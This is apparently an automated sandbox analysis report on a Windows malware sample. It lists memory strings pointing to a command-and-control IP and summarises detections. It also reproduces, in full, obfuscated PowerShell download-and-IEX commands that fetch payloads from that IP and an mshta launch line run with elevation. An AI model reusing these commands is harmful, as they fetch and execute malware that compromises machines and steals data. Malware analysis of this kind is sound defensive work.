              Source: mshta.exe, 0000000C.00000003.2298038675.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2307546344.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308819002.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update/...
              Source: mshta.exe, 0000000C.00000003.2298038675.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2307546344.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308819002.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update/...&
              Source: mshta.exe, 0000000C.00000002.2308865314.000002A6CABA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2290227750.000002A6CABA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update/6
              Source: mshta.exe, 0000000C.00000002.2308865314.000002A6CABA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2290227750.000002A6CABA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update/8
              Source: mshta.exe, 0000000C.00000002.2308601542.000002A6CAB66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB46000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2307499590.000002A6CAB63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update/C:
              Source: mshta.exe, 0000000C.00000003.2289380947.000002AECD0F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2287264466.000002AECD0F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2290150546.000002AECD0F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update/D
              Source: mshta.exe, 0000000C.00000002.2308865314.000002A6CABA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2290227750.000002A6CABA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update/F
              Source: mshta.exe, 0000000C.00000003.2299936329.000002AECCF8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update/a
              Source: mshta.exe, 0000000C.00000003.2289380947.000002AECD0F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2296588844.000002AECD0F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2310604898.000002AECD0F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2287264466.000002AECD0F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2290150546.000002AECD0F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update/eLMEMP
              Source: mshta.exe, 0000000C.00000003.2286360520.000002A6CAB11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308601542.000002A6CAB14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB46000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308601542.000002A6CAB46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update/ft
              Source: mshta.exe, 0000000C.00000003.2298065296.000002AECCF85000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2296225919.000002AECCF83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update/http://176.113.115.178/Windows-Update/0
              Source: mshta.exe, 0000000C.00000003.2289380947.000002AECD0F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2287264466.000002AECD0F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2290150546.000002AECD0F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update/l
              Source: mshta.exe, 0000000C.00000002.2308865314.000002A6CABA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2290227750.000002A6CABA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update/n
              Source: mshta.exe, 0000000C.00000002.2308438812.000002A6CAAF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update/tz
              Source: wscript.exe, 00000009.00000002.2255820509.0000022C1EE8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2253868783.0000022C1EE8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2254057119.0000022C1EE8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Update0
              Source: mshta.exe, 0000000C.00000003.2294382542.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308571523.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2287051707.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-UpdateG
              Source: wscript.exe, 00000009.00000003.2254364531.0000022C1EFE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.2256404541.0000022C1EFE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2309103882.000002A6CAD40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-UpdateH
              Source: wscript.exe, 00000009.00000003.2252773588.0000022C1EEDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2252932375.0000022C1EEDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2252120336.0000022C1EEDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.2256210413.0000022C1EEDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-UpdateLMEM
              Source: mshta.exe, 0000000C.00000002.2310783171.000002AED14F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-UpdateQ
              Source: mshta.exe, 0000000C.00000003.2294382542.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308571523.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2287051707.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-UpdateU
              Source: mshta.exe, 0000000C.00000002.2308438812.000002A6CAAD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-UpdateWinsta0
              Source: wscript.exe, 00000009.00000002.2256453688.0000022C20C90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Updateai
              Source: mshta.exe, 0000000C.00000002.2309157369.000002A6CAD60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Updated.exj
              Source: mshta.exe, 0000000C.00000003.2294382542.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308571523.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2287051707.000002A6CAB0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Updatee
              Source: wscript.exe, 00000009.00000002.2255456357.0000022C1EE10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Updatei%%%%%n%%%g(
              Source: mshta.exe, 0000000C.00000002.2308438812.000002A6CAAD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Updatemshta
              Source: wscript.exe, 00000009.00000003.2252773588.0000022C1EEDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2252932375.0000022C1EEDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2252120336.0000022C1EEDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.2256210413.0000022C1EEDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Updatenr=
              Source: mshta.exe, 0000000C.00000002.2308438812.000002A6CAAD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/Windows-Updateq
              Source: powershell.exe, 00000007.00000002.2296607052.000001CF7AF40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/ff/3.png
              Source: wscript.exe, 00000004.00000003.2188071581.000001D049241000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2187242940.000001D049241000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.2194375546.000001D049241000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.2189720210.000001D049241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.1150
              Source: svchost.exe, 0000000E.00000002.2763422288.000002B01D686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: svchost.exe, 0000000E.00000003.2287325300.000002B01D800000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: powershell.exe, 00000005.00000002.2240161447.0000015F81A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276197727.000001CF72A85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2232422986.000001CF642AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276197727.000001CF72943000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2859313115.0000026810074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2689152499.0000026801A70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2859313115.00000268101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2446464811.000001D13D1F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000011.00000002.2349548172.000001D12D3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000011.00000002.2349548172.000001D12D3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000005.00000002.2240161447.0000015F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2232422986.000001CF628D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2689152499.0000026800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2349548172.000001D12D181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000011.00000002.2349548172.000001D12D3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 00000011.00000002.2349548172.000001D12D3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000011.00000002.2467005592.000001D145920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
              Source: powershell.exe, 00000011.00000002.2467005592.000001D14593D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: mshta.exe, 0000000C.00000003.2286360520.000002A6CAB9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
              Source: powershell.exe, 00000005.00000002.2240161447.0000015F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2232422986.000001CF628D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2689152499.0000026800001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2349548172.000001D12D181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000011.00000002.2446464811.000001D13D1F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000011.00000002.2446464811.000001D13D1F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000011.00000002.2446464811.000001D13D1F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: svchost.exe, 0000000E.00000003.2287325300.000002B01D85E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
              Source: svchost.exe, 0000000E.00000003.2287325300.000002B01D800000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
              Source: powershell.exe, 00000011.00000002.2349548172.000001D12D3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000005.00000002.2240161447.0000015F80C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2232422986.000001CF63B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2689152499.0000026800C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: mshta.exe, 0000000C.00000003.2298038675.000002A6CAB82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2308723282.000002A6CAB82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2286360520.000002A6CAB82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: powershell.exe, 00000005.00000002.2240161447.0000015F81A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276197727.000001CF72A85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2232422986.000001CF642AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2276197727.000001CF72943000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2859313115.0000026810074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2859313115.00000268101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2446464811.000001D13D1F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

              System Summary

              barindex
              PE file contains section with special chars
              Source: LB31.exe.15.drStatic PE information: section name:
              Source: LB31.exe.15.drStatic PE information: section name: .idata
              Source: LB31.exe.15.drStatic PE information: section name:
              Source: Mig.exe.26.drStatic PE information: section name:
              Source: Mig.exe.26.drStatic PE information: section name: .idata
              Source: Mig.exe.26.drStatic PE information: section name:
              Potential malicious VBS script found (suspicious strings)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped file: objShell.ShellExecute "cmd.exe", "/c mshta http://176.113.115.178/Windows-Update", , "runas", 0Jump to dropped file
              Powershell drops PE file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\LB31.exeJump to dropped file
              Uses powercfg.exe to modify the power settings
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-UpdateJump to behavior
              Source: C:\Windows\System32\dialer.exeCode function: 49_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,49_2_00000001400010C0
              Source: C:\Windows\System32\winlogon.exeCode function: 54_2_000002D0165E28C8 NtEnumerateValueKey,NtEnumerateValueKey,54_2_000002D0165E28C8
              Source: C:\Windows\System32\lsass.exeCode function: 62_2_000002D6F151253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,62_2_000002D6F151253C
              Source: C:\Windows\System32\lsass.exeCode function: 62_2_000002D6F151202C NtQuerySystemInformation,StrCmpNIW,62_2_000002D6F151202C
              Source: C:\Windows\System32\dwm.exeCode function: 64_2_000001D15B0528C8 NtEnumerateValueKey,NtEnumerateValueKey,64_2_000001D15B0528C8
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD340B49E90_2_00007FFD340B49E9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD340B206B0_2_00007FFD340B206B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD340B48A30_2_00007FFD340B48A3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD340B2CEC0_2_00007FFD340B2CEC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD340B21300_2_00007FFD340B2130
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD340B42BB0_2_00007FFD340B42BB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FFD340B53CA0_2_00007FFD340B53CA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD340A3CF25_2_00007FFD340A3CF2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD340A48055_2_00007FFD340A4805
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD340A54FA7_2_00007FFD340A54FA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD340A48E07_2_00007FFD340A48E0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD340A5FE67_2_00007FFD340A5FE6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFD340C16BF15_2_00007FFD340C16BF
              Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001DCAFC1D0E016_2_000001DCAFC1D0E0
              Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001DCAFC238A816_2_000001DCAFC238A8
              Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001DCAFC11F2C16_2_000001DCAFC11F2C
              Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001DCB14E2B2C16_2_000001DCB14E2B2C
              Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001DCB14F44A816_2_000001DCB14F44A8
              Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001DCB14EDCE016_2_000001DCB14EDCE0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD340C84D317_2_00007FFD340C84D3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD340C64FB17_2_00007FFD340C64FB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD340CADF217_2_00007FFD340CADF2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD340C56AD17_2_00007FFD340C56AD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD340C62F317_2_00007FFD340C62F3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD340CBBFB17_2_00007FFD340CBBFB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD340C5BFA17_2_00007FFD340C5BFA
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 19_2_0000022464431F2C19_2_0000022464431F2C
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 19_2_00000224644438A819_2_00000224644438A8
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 19_2_000002246443D0E019_2_000002246443D0E0
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 19_2_0000022464462B2C19_2_0000022464462B2C
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 19_2_00000224644744A819_2_00000224644744A8
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 19_2_000002246446DCE019_2_000002246446DCE0
              Source: C:\Windows\System32\dialer.exeCode function: 49_2_000000014000226C49_2_000000014000226C
              Source: C:\Windows\System32\dialer.exeCode function: 49_2_00000001400014D849_2_00000001400014D8
              Source: C:\Windows\System32\dialer.exeCode function: 49_2_000000014000256049_2_0000000140002560
              Source: C:\Windows\System32\winlogon.exeCode function: 54_2_000002D016581F2C54_2_000002D016581F2C
              Source: C:\Windows\System32\winlogon.exeCode function: 54_2_000002D0165938A854_2_000002D0165938A8
              Source: C:\Windows\System32\winlogon.exeCode function: 54_2_000002D01658D0E054_2_000002D01658D0E0
              Source: C:\Windows\System32\winlogon.exeCode function: 54_2_000002D0165E2B2C54_2_000002D0165E2B2C
              Source: C:\Windows\System32\winlogon.exeCode function: 54_2_000002D0165F44A854_2_000002D0165F44A8
              Source: C:\Windows\System32\winlogon.exeCode function: 54_2_000002D0165EDCE054_2_000002D0165EDCE0
              Source: C:\Windows\System32\lsass.exeCode function: 62_2_000002D6F14ED0E062_2_000002D6F14ED0E0
              Source: C:\Windows\System32\lsass.exeCode function: 62_2_000002D6F14F38A862_2_000002D6F14F38A8
              Source: C:\Windows\System32\lsass.exeCode function: 62_2_000002D6F14E1F2C62_2_000002D6F14E1F2C
              Source: C:\Windows\System32\lsass.exeCode function: 62_2_000002D6F151DCE062_2_000002D6F151DCE0
              Source: C:\Windows\System32\lsass.exeCode function: 62_2_000002D6F15244A862_2_000002D6F15244A8
              Source: C:\Windows\System32\lsass.exeCode function: 62_2_000002D6F1512B2C62_2_000002D6F1512B2C
              Source: C:\Windows\System32\svchost.exeCode function: 63_2_0000014E41FAD0E063_2_0000014E41FAD0E0
              Source: C:\Windows\System32\svchost.exeCode function: 63_2_0000014E41FB38A863_2_0000014E41FB38A8
              Source: C:\Windows\System32\svchost.exeCode function: 63_2_0000014E41FA1F2C63_2_0000014E41FA1F2C
              Source: C:\Windows\System32\svchost.exeCode function: 63_2_0000014E41FDDCE063_2_0000014E41FDDCE0
              Source: C:\Windows\System32\svchost.exeCode function: 63_2_0000014E41FE44A863_2_0000014E41FE44A8
              Source: C:\Windows\System32\svchost.exeCode function: 63_2_0000014E41FD2B2C63_2_0000014E41FD2B2C
              Source: C:\Windows\System32\dwm.exeCode function: 64_2_000001D15B011F2C64_2_000001D15B011F2C
              Source: C:\Windows\System32\dwm.exeCode function: 64_2_000001D15B01D0E064_2_000001D15B01D0E0
              Source: C:\Windows\System32\dwm.exeCode function: 64_2_000001D15B0238A864_2_000001D15B0238A8
              Source: C:\Windows\System32\dwm.exeCode function: 64_2_000001D15B052B2C64_2_000001D15B052B2C
              Source: C:\Windows\System32\dwm.exeCode function: 64_2_000001D15B05DCE064_2_000001D15B05DCE0
              Source: C:\Windows\System32\dwm.exeCode function: 64_2_000001D15B0644A864_2_000001D15B0644A8
              Source: Joe Sandbox ViewDropped File: C:\ProgramData\Mig\Mig.exe A1A8CFCC74F8F96FD09115189DEFE07AC6FC2E85A9FF3B3EC9C6F454AEDE1C1D
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\LB31.exe A1A8CFCC74F8F96FD09115189DEFE07AC6FC2E85A9FF3B3EC9C6F454AEDE1C1D
              Source: file.exe, 00000000.00000000.2172199529.0000000000922000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFIL3.exe* vs file.exe
              Source: file.exe, 00000000.00000002.2204798720.0000000000D3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.spyw.expl.evad.winEXE@74/28@0/2
